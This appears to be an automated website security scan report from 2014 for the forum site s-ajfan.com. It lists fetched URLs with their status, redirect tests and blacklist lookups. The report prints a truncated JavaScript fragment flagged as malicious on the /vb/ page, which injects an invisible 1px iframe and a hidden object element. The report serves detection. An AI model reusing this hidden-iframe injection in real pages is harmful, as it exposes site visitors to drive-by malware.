Scanned pages/files
Request | Server response | Status |
http://s-ajfan.com/ | HTTP/1.1 200 OK Connection: close Date: Mon, 08 Sep 2014 19:53:25 GMT Accept-Ranges: bytes Server: nginx admin Content-Length: 67 Content-Type: text/html Last-Modified: Sat, 28 Dec 2013 19:29:10 GMT X-Cache: HIT from Backend | clean |
http://s-ajfan.com/vb/ | 200 OK Content-Length: 205791 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var interstitialBox={ ie7: window.XMLHttpRequest && document.all && !window.opera, ie7offline: this.ie7 && window.location.href.indexOf("http")==-1, launch:false, scrollbarwidth: 16, loadpage:function(url){ page_request = url document.getElementById("interContent").innerHTML='<iframe src="'+ page_request +'" style="width: 10%; height: 1px" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hs } var pppid='pppid142'; document.write("<object style='display:block;width:1px;height:1px;position:absolute;left:0px;top:0px' id='"+pppid+"'></object>"); if (usingObject) {setupObject();} if (usingEditor) {startObject();} loadingPop(); self.focus(); --> Antivirus reports:
| ||
http://s-ajfan.com/vb/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387 | 200 OK Content-Length: 36628 Content-Type: application/javascript | clean |
http://s-ajfan.com/clientscript/yui/connection/connection-min.js?v=387 | 404 Not Found Content-Length: 362 Content-Type: text/html | clean |
http://s-ajfan.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://s-ajfan.com/clientscript/vbulletin_global.js?v=387 | 404 Not Found Content-Length: 349 Content-Type: text/html | clean |
http://s-ajfan.com/clientscript/vbulletin_menu.js?v=387 | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.s-ajfan.com/vb/clientscript/ncode_imageresizer.js?v=1.0.2 | 200 OK Content-Length: 9465 Content-Type: application/javascript | clean |
http://www.s-ajfan.com/vb/clientscript/slimbox/slimbox.js | 200 OK Content-Length: 4300 Content-Type: application/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12388 Content-Type: application/javascript | clean |
http://s-ajfan.com/massy/poem.js | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://s-ajfan.com/massy/gradient.js | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-1.4.2.min.js | 404 Not Found Content-Length: 350 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-ui-1.8.1.custom.min.js | 404 Not Found Content-Length: 360 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery.easing.1.3.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
http://s-ajfan.com/aerowindow/js/jquery-AeroWindow.js | 404 Not Found Content-Length: 351 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: s-ajfan.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 08 Sep 2014 19:53:25 GMT
Accept-Ranges: bytes
Server: nginx admin
Content-Length: 67
Content-Type: text/html
Last-Modified: Sat, 28 Dec 2013 19:29:10 GMT
X-Cache: HIT from Backend
...67 bytes of data.
GET / HTTP/1.1
Host: s-ajfan.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 08 Sep 2014 19:53:25 GMT
Accept-Ranges: bytes
Server: nginx admin
Content-Length: 67
Content-Type: text/html
Last-Modified: Sat, 28 Dec 2013 19:29:10 GMT
X-Cache: HIT from Backend
...67 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: s-ajfan.com
Referer: http://www.google.com/search?q=s-ajfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: s-ajfan.com
Referer: http://www.google.com/search?q=s-ajfan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=s-ajfan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://s-ajfan.com/
Result: s-ajfan.com is not infected or malware details are not published yet.
Result: s-ajfan.com is not infected or malware details are not published yet.